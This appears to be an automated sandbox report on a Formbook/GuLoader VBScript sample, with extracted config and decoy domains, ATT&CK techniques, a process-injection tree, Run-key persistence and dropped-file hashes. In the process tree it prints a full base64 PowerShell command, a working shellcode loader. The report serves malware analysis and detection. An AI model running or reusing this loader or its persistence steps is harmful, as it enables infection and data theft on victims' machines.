formbook | f492e41de8e486bc3ee6e597232d0b80332252a2ccc24e33604836d6b1e3235c

Analysis

max time kernel
148s
max time network
151s
platform
windows7_x64
resource
win7-en-20211208
submitted
31-01-2022 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file8939928_89388.vbs
Size

162KB
MD5

b889242d05699b592a96112125919adf
SHA1

3d01fafa08dfdc3c3ad167f2a1c0cee1ac42f64a
SHA256

f492e41de8e486bc3ee6e597232d0b80332252a2ccc24e33604836d6b1e3235c
SHA512

0707c415f61e5cf581ad7b3dccddb8152ddde59b070a418817ce1201a2b48bfe5f19b192e1ec05d86c3bc55b21e663bd272a15830fb179ab1747fa9cafe20327

Score

10^/10

formbook guloader k6sm downloader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

k6sm

Decoy

mingshengjewelry.com

ontimecleaningenterprise.com

alyssa0.xyz

ptecex.xyz

dukfot.online

pvcpc.com

iowalawtechnology.com

nestletranspotation.com

mysithomes.com

greenlakespaseattle.com

evofishingsystems.com

unilytcs.com

ordemt.com

dentalbatonrouge.com

pictureme360.net

chalinaslacatalana.com

newmirrorimage.xyz

pinklaceandlemonade.com

rapinantes.com

yzicpa.com

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Formbook Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/364-78-0x0000000000400000-0x000000000069B000-memory.dmp	formbook
behavioral1/memory/364-79-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/1108-85-0x0000000000090000-0x00000000000BF000-memory.dmp	formbook

Adds policy Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	msiexec.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ieinstal.exepowershell.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\KV1LYJZPT4 = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe"	msiexec.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

ieinstal.exe

pid process

364 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1480 powershell.exe
364 ieinstal.exe

pid	process
364	ieinstal.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exeieinstal.exemsiexec.exe

description	pid	process	target process
PID 1480 set thread context of 364	1480	powershell.exe	ieinstal.exe
PID 364 set thread context of 1220	364	ieinstal.exe	Explorer.EXE
PID 1108 set thread context of 1220	1108	msiexec.exe	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	msiexec.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exeieinstal.exemsiexec.exe

pid	process
1480	powershell.exe
364	ieinstal.exe
364	ieinstal.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe
1108	msiexec.exe

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeieinstal.exemsiexec.exe

pid process

1480 powershell.exe
364 ieinstal.exe
364 ieinstal.exe
364 ieinstal.exe
1108 msiexec.exe
1108 msiexec.exe
1108 msiexec.exe
1108 msiexec.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeieinstal.exemsiexec.exe

description pid process

Token: SeDebugPrivilege 1480 powershell.exe
Token: SeDebugPrivilege 364 ieinstal.exe
Token: SeDebugPrivilege 1108 msiexec.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

1220 Explorer.EXE
1220 Explorer.EXE
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

1220 Explorer.EXE
1220 Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	364	ieinstal.exe
Token: SeDebugPrivilege	1108	msiexec.exe

pid	process
1220	Explorer.EXE
1220	Explorer.EXE

pid	process
1220	Explorer.EXE
1220	Explorer.EXE

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

WScript.exepowershell.execsc.exeExplorer.EXEmsiexec.exe

description	pid	process	target process
PID 952 wrote to memory of 1480	952	WScript.exe	powershell.exe
PID 952 wrote to memory of 1480	952	WScript.exe	powershell.exe
PID 952 wrote to memory of 1480	952	WScript.exe	powershell.exe
PID 952 wrote to memory of 1480	952	WScript.exe	powershell.exe
PID 1480 wrote to memory of 1100	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 1100	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 1100	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 1100	1480	powershell.exe	csc.exe
PID 1100 wrote to memory of 832	1100	csc.exe	cvtres.exe
PID 1100 wrote to memory of 832	1100	csc.exe	cvtres.exe
PID 1100 wrote to memory of 832	1100	csc.exe	cvtres.exe
PID 1100 wrote to memory of 832	1100	csc.exe	cvtres.exe
PID 1480 wrote to memory of 364	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 364	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 364	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 364	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 364	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 364	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 364	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 364	1480	powershell.exe	ieinstal.exe
PID 1220 wrote to memory of 1108	1220	Explorer.EXE	msiexec.exe
PID 1220 wrote to memory of 1108	1220	Explorer.EXE	msiexec.exe
PID 1220 wrote to memory of 1108	1220	Explorer.EXE	msiexec.exe
PID 1220 wrote to memory of 1108	1220	Explorer.EXE	msiexec.exe
PID 1220 wrote to memory of 1108	1220	Explorer.EXE	msiexec.exe
PID 1220 wrote to memory of 1108	1220	Explorer.EXE	msiexec.exe
PID 1220 wrote to memory of 1108	1220	Explorer.EXE	msiexec.exe
PID 1108 wrote to memory of 1728	1108	msiexec.exe	Firefox.exe
PID 1108 wrote to memory of 1728	1108	msiexec.exe	Firefox.exe
PID 1108 wrote to memory of 1728	1108	msiexec.exe	Firefox.exe
PID 1108 wrote to memory of 1728	1108	msiexec.exe	Firefox.exe
PID 1108 wrote to memory of 1728	1108	msiexec.exe	Firefox.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file8939928_89388.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAG4AZABlAGwAMQAgAFMAYwByAGkAbQBzAGgAYQAgAG0AYQBjAHIAbwAgAEMAZQBuAHQAZQByACAARABpAHMAcwBvAGMAaQAgAGYAcgBlAG0AcwBwAHIAIABUAGUAdAByACAAVAB1AHIAZQBzAGEAYwByADcAIABIAHkAcABvAHAAMQAgAFQAUgBBAE4AUwAgAHMAeQBtAG0AZQB0AHIAaQAgAFMAVABFAEcATgBJACAAQQBGAE0AQQBUACAAUABpAGMAYwAgAEgAZABiAGsAZgBlAHMANAAgAHMAYQBzAGkAYQAgAE0AYQBuAGkAcAB1AGwAIABJAG4AZAB1AHMAIABzAHUAYgBzACAARgB1AHQAdABvAGcAZQBzAHUAbgA4ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABCAEUAVgBBADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABCAEUAVgBBADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAE8AVQBUAEgAWQBQAEUAUgAsAGkAbgB0ACAAVABlAHIAcgBpADUALAByAGUAZgAgAEkAbgB0ADMAMgAgAEIARQBWAEEALABpAG4AdAAgAFIAZQBmAGkAZwBlADcALABpAG4AdAAgAEIARQBWAEEANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABUAEgAQQBMAEEATQBJAFUATQAsAHUAaQBuAHQAIABnAGUAbQBtACwAaQBuAHQAIABSAGUAdAB0AGkALABpAG4AdAAgAEIARQBWAEEAMAAsAGkAbgB0ACAARgBVAE0ATAAsAGkAbgB0ACAAZAByAGEAZwBzAGgALABpAG4AdAAgAGcAbwB1AHIAbQBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAFQAZQByAHIAaQA1ADAALAB1AGkAbgB0ACAAVABlAHIAcgBpADUAMQAsAEkAbgB0AFAAdAByACAAVABlAHIAcgBpADUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABlAHIAcgBpADUAMwAsAGkAbgB0ACAAVABlAHIAcgBpADUANAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAQQAoAEkAbgB0AFAAdAByACAAVABlAHIAcgBpADUANQAsAGkAbgB0ACAAVABlAHIAcgBpADUANgAsAGkAbgB0ACAAVABlAHIAcgBpADUANwAsAGkAbgB0ACAAVABlAHIAcgBpADUAOAAsAGkAbgB0ACAAVABlAHIAcgBpADUAOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBzAHUAYgBjAG8AIABCAEUAQgBPACAAVQBOAFMAVABSACAAVQBuAGgAaQBlAHIAYQA5ACAAUABSAEUASABJAFMAIABFAE0AQQBOAFUARQBMACAARQBzAGMAaABhAGwAbwB0AHAAaQAyACAASwByAHkAZABzAGUAcgBzAHcAYQAyACAAQgBvAGMAawBlAHIAZQBsAHQAIABCAHIAYQBuAGQAIABpAG4AZAByAHkAawBrAGUAIABTAFUAUABFAFIAQwAgAFUATgBEAEUAUgBQAFIAIABLAGEAaAB5ADQAIABSAEEASQBMAEwASQBLAEUAQQBQACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEsATwBMAEUAVQBOAEQARQBSACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE8AdgBlAHIANQAiACAADQAKACQAQgBFAFYAQQAzAD0AMAA7AA0ACgAkAEIARQBWAEEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABCAEUAVgBBADgAPQBbAEIARQBWAEEAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABCAEUAVgBBADMALAAwACwAWwByAGUAZgBdACQAQgBFAFYAQQA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMAVwBoAGkAZwBnAGkAIABuAG8AbgBzAHUAYgBsAGkAIABBAGQAbQBpAHIAYQBiACAAUwB2AGEAbgBnAHIAZQBoADMAIABWAGEAYQBuADkAIABzAGEAdQB0AGUAcgAgAHAAcgBlAG0AYQBuACAASQBOAEMASABFAFMAIABhAGYAcgBlAGcAbgBpAG4AIABQAGEAbABsAGUAdAB0AGUAZQBuADEAIABlAHYAYQBsAHUAZQByACAARABhAHQAYQBlAGwAZQBtAGUAbgA5ACAAVQBnAHkAbABkAGkAZwBlACAAVQBwAHQAcgBpAGwAbAAgAGMAdQByAHUAcABhACAAQgBFAFIASQBCAEIAIABMAEkARABFACAARABlAG0AdQBsACAAVQBuAHAAcgBvAGgAIABEAEUAUABSAEEAVgBFACAAVQBuAHAAbAAgAHIAZQBuAGUAZwBvACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBWAG8AbAB1AG4AdABhADcAIgAgAA0ACgAkAEIARQBWAEEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASQBuAGQAZABhAHQANwAuAGQAYQB0ACIADQAKACMAaQBuAGMAbwBtAHAAbABpAGEAbgAgAEYAUgBFAEUAVwBBAFIARQBNAEEAIABEAGUAcwB1AGwAcABoAHUAcgAgAGMAcgBvAHMAcwBsACAAYgBvAHAAYQBlAGwAYgBoAG0AYQAgAEQAbwBtAGkAbgBpAG8AbgBtACAAUwB1AHoAeQBjACAAVQBuAGQAZQAyACAAawB2AGsAZQByAGgAbwAgAEYAbwByAG0AIABvAGwAZAB0AGkAZAAgAFIAZQB0AGEAbABsAGkAMwAgAA0ACgAkAEIARQBWAEEANAA9AFsAQgBFAFYAQQAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQAQgBFAFYAQQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAEQAdwBhAHIAZgAgAEsAYQB0AHQAZQB0AHUAbgBnAGUANgAgAFMAbwBsAGQAaQBlAHIAIABTAGkAcgBwAGwAMQAgAGIAaQBsAGwAZQBkAG0AIABOAG8AbgBhAGIAIABBAEsAVABGAFIAVQBTAFQAUgBBACAAUwBuAGsAbgAgAGgAZQBwAGEAdABvAGQAeQBzACAARgBhAGQAZQBiAHUAcgA1ACAARABBAE0AUABNAEEAUwAgAFMAZABpAGcAaAAgAHEAdQBhAGQAcgAgAE8AUABSAEUAIABsAGkAbgBrACAATABBAFUAUgBFAEwAIABzAHAAcgBpAHQAcwBtAHUAIABCAG8AcgB0ACAAQgBvAG4AdQBzAHMAIABTAGsAZQBsAGUAdABzAGsAZQAgAFQATwBSAEUAQQBEACAAQwBIAEkATQBBAEUAUgAgAGYAbwByAG0AZQByAGkAIABVAEIARQBTAFIARwBFAFQATwBFACAAUgBPAFMASQBOAEcASwAgAGEAcwBzAHUAbQBlAGQAaQBuACAAUwB0AHIAYQBuADYAIABUAGUAbABlAGYANwAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwB1AGIAcwB0AHIAdQBjAHQANQAiACAADQAKACQAQgBFAFYAQQA1AD0AMAA7AA0ACgAjAFMAbwBnAGQAaQAgAGsAZQBqAHMAZQByAGwAaQBnACAAQQBjAGMAbABpAG0AYQB0AGkAMgAgAFAAQQBDAEkARgBJACAATQBhAGoAcwBhAHAAYQBsAGEAIABHAEwAQQBDAEkAIABFAGYAdABlAHIAYQBhAHIAcwBiADIAIABTAG0AcgBlACAASQBsAGwAdQBzAHQAcgBhAHQAaQAgAFMAdQBiAHQAcgBhADYAIABTAGEAZwB0AG4AZQBuAGQANAAgAE0AaQBsAGoAYgBlAHMAawB5ACAAQwBhAHMAcwBlAHIAbwBsAGUAcwAgAGQAcgBvAHAAcABlAHIAcwAgAGIAYQBzAHUAbgBpAHMAdAAgAEQAbwB0AGEAcgBkAGwAeQBnAHIAMwAgAHUAbgBkAGUAcgBzAGwAIABTAHAAaQBsAGQAZQB2AGEAbgAgAHMAcABhAG4AZQAgAE0AdQBjAG8AcAByACAAYwBoAGUAbQBvAGEAdQB0AG8AIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgAYQBtAHIAZQBuADMAIgAgAA0ACgBbAEIARQBWAEEAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAEIARQBWAEEANAAsACQAQgBFAFYAQQAzACwANgAwADgAMAA2ACwAWwByAGUAZgBdACQAQgBFAFYAQQA1ACwAMAApAA0ACgAjAFQAaQBtAGUAcwBoAGEAcgBlAHMANgAgAGgAYQBuAGQAZQBsAHMAZgB5ACAAUwBjAG8AdABjADYAIABPAHAAcwB0AGEAbgBkAHIAIABnAHIAdQBzAHYAcgBrAGUAIABtAGUAbgBzAHUAIABmAG8AcgBzAHQAdABlAHIAIABTAHQAZQBtAHAANAAgAG0AaQBkAGQAZQBsAGgAagBkACAAdABlAGcAbgB0AGEAZQB0AGgAIABoAGEAcgBkAHcAaQByACAAUwBqAG8AdgBlAHIAcwBuAGUAbwAgAGEAZABtAGEAbgBlAHUAawAgAHQAagBhAHQAdAAgAGcAcgBhAHYAcwB0AG4AIABTAFUAQgBEAEkAQQAgAEMAbwBkAGkAZgB5AGkAbgBnADcAIABBAG4AbABnAHMAYQByAGIAIABUAEgATwBSAEEATABOAFUAIABKAGEAcwB0AGUAbQBtACAAQgBhAGwAbABhAGQAZQBtAGEANAAgAFUAbQBiAG8AbgB1ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAFkATgBVAE4ARABFAFIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQwBIAEEAUABUAEEATABJAFMARQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAYQB0AHQAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwBoAGEAcgBlAGgAbwBsACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFYAQQBOAEQARgBPAFIAUwBZACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAYQByAG4AZQBzAGQAZQByAG4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAdAByAGgAdgBlAHAAcwBlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGcAdQBsAHMAbwB0AGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAcgBlAG4AdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBjAHUAdABpAGMAbABlAHcAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASQBuAGYAbwByAG0AYQB0AGkAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAE8ATgBDAE8AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASQBOAFMAVABJACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFIAdQBtAG0AZQBsAGkAZwBzADUAIgAgAA0ACgBbAEIARQBWAEEAMQBdADoAOgBDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAQQAoACQAQgBFAFYAQQAzACwAIAAwACwAMAAsADAALAAwACkADQAKAA0ACgA="
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zxtp4xdl.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8882.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8871.tmp"
5⤵
PID:832

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:364

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1108

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:1728

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Inddat7.dat
MD5
72799fb2330d7c81424a04b60faca8a3

SHA1
e827380b09f6b26c9f771ca23cd154c75a419e8a

SHA256
002e7e7ef88cb94795a1e7c882ad078e1e6133eda8cc32531640292526b0dec6

SHA512
69b16116da9aaa307d4de78eacc406118efa6e9e289017c78548c0ade9b17de3e00377632ba8364bbab94d16bb2cdc43444ed8498745c56adc72f1d3c1169ade

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8882.tmp
MD5
892c11d29fdfcd01e65a1fa8efeb7544

SHA1
3d9f6b92761666b556dce0ba13c0a930f9f3beeb

SHA256
62939974f4d685d8a677db4ed0200287d618d043fa4c33d0686e38fba79dd006

SHA512
4274c853000979dd73669008699f26dce4d0230f51ca6b82d34851a149344f7eded88965bb76d4a3c72266a5fe79778b8d9efb6c8b39ac793ea9b70ce68411b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\zxtp4xdl.dll
MD5
21a5fcd94491b4c15adb057f8a6fc60e

SHA1
6f432d1662a1ce13f86d86fd4698e0d2f37922ea

SHA256
e687d1d159105080e171fcd5e1b8b0c902f6efc0285b1fc55985c7fe37d6ee85

SHA512
a3bb86072c00902ae84a0dc2e4401f86d508e8bf2d77de7e468225fd6425285919d02a4dcd6a1b1fda34e2e10fa16830f41fb5cf4f1c3a32632e7eef50895fe3

Download Submit
C:\Users\Admin\AppData\Local\Temp\zxtp4xdl.pdb
MD5
d718183df6d66a9d20cb2b13f8312a70

SHA1
e14e2f5155219f11cd413e3906a2c5b6d1ee6638

SHA256
088c07a6bab7a5dfc77389b6442f75f7b2aed250b92469bbfab6d149d1f32654

SHA512
f43daa22b2b56aa7009688fd6af0c2cf24047c2366766898c490354c64a5691582fb87e55c4f98390c6e6c04a0c079e5a25e8ceb5ccd95c54bba687d6a7c7fc6

Download Submit
C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologim.jpeg
MD5
6c917b59fb81152b2ba12d692acad316

SHA1
a23d8f3a9f60446362cd2a9c4acd4d30f7d711d1

SHA256
759722c0de52a4b5fb361463b4824de1c52b7e85ccc64519aed6e917bebc57f3

SHA512
b0a433e055c3683b91a0319d947fa4071f14ae754562390b7309457041fa0611337586eac06cd2756fe8ed4f410c939104a431d86200f5041fd47b1c3796de3e

Download Submit
C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologrf.ini
MD5
2f245469795b865bdd1b956c23d7893d

SHA1
6ad80b974d3808f5a20ea1e766c7d2f88b9e5895

SHA256
1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361

SHA512
909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

Download Submit
C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologri.ini
MD5
d63a82e5d81e02e399090af26db0b9cb

SHA1
91d0014c8f54743bba141fd60c9d963f869d76c9

SHA256
eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae

SHA512
38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

Download Submit
C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologrv.ini
MD5
ba3b6bc807d4f76794c4b81b09bb9ba5

SHA1
24cb89501f0212ff3095ecc0aba97dd563718fb1

SHA256
6eebf968962745b2e9de2ca969af7c424916d4e3fe3cc0bb9b3d414abfce9507

SHA512
ecd07e601fc9e3cfc39addd7bd6f3d7f7ff3253afb40bf536e9eaac5a4c243e5ec40fbfd7b216cb0ea29f2517419601e335e33ba19dea4a46f65e38694d465bf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8871.tmp
MD5
c9d014e49ee5a1793f4d4dddba14992a

SHA1
c4de047cc8958806b9a4c844ba88cf8943868408

SHA256
d82281f7be5d7fcecfb596231d542f77a202e2173fd947ab42719e67993def23

SHA512
07bc640bbf71b569ffd4e00075d477f56f800cf597ba7887e3e1f5140b78922558df6817b50ba2aa2e6cf27c9e88fc8ee4655be098eed46e98550c34cfd520b1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zxtp4xdl.0.cs
MD5
c2052a0d7c2657d1684b540075b15158

SHA1
7d5468a3e960f77c26197816a5d562cbfe6d2cae

SHA256
0921f2056dfe4f1bd5405f5451a7b80319506f8f1b49cda453a06673cb6c3eec

SHA512
ead417832d4ae55d68d202cb91c51b6d1b4b46275e4ebf72c60b2ba96d5efed17ee5a1485aa91a77720e1752e68f8e9eeb54cfa562d97c2b7d70d7358875822d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zxtp4xdl.cmdline
MD5
d42204c2290aff73f5d1458204b3c5fb

SHA1
c76e931b28630dbef327b90fd7c3dc850522ccd4

SHA256
8988297d0d77743ed7b1f5a0134f9a6af3e22247ae9669b75dae947bc20a8dd3

SHA512
2cd364ec4724dc44df899edd2b9583037cdeb5f9abe45f3c99cc4299c89709951d67b6e570bfc21dabf083e465aa0e68605d2c3669fe6a0c57a6ef5e114556ed

Download Submit
memory/364-70-0x0000000000250000-0x0000000000350000-memory.dmp

Filesize
1024KB

Download
memory/364-74-0x0000000076D50000-0x0000000076EF9000-memory.dmp

Filesize
1.7MB

Download
memory/364-77-0x0000000076F30000-0x00000000770B0000-memory.dmp

Filesize
1.5MB

Download
memory/364-78-0x0000000000400000-0x000000000069B000-memory.dmp

Filesize
2.6MB

Download
memory/364-79-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/364-80-0x000000001C710000-0x000000001CA13000-memory.dmp

Filesize
3.0MB

Download
memory/364-81-0x000000001BC00000-0x000000001BC15000-memory.dmp

Filesize
84KB

Download
memory/952-54-0x000007FEFB5D1000-0x000007FEFB5D3000-memory.dmp

Filesize
8KB

Download
memory/1100-61-0x0000000000290000-0x00000000002D0000-memory.dmp

Filesize
256KB

Download
memory/1108-86-0x00000000022E0000-0x00000000025E3000-memory.dmp

Filesize
3.0MB

Download
memory/1108-87-0x00000000009D0000-0x0000000000A64000-memory.dmp

Filesize
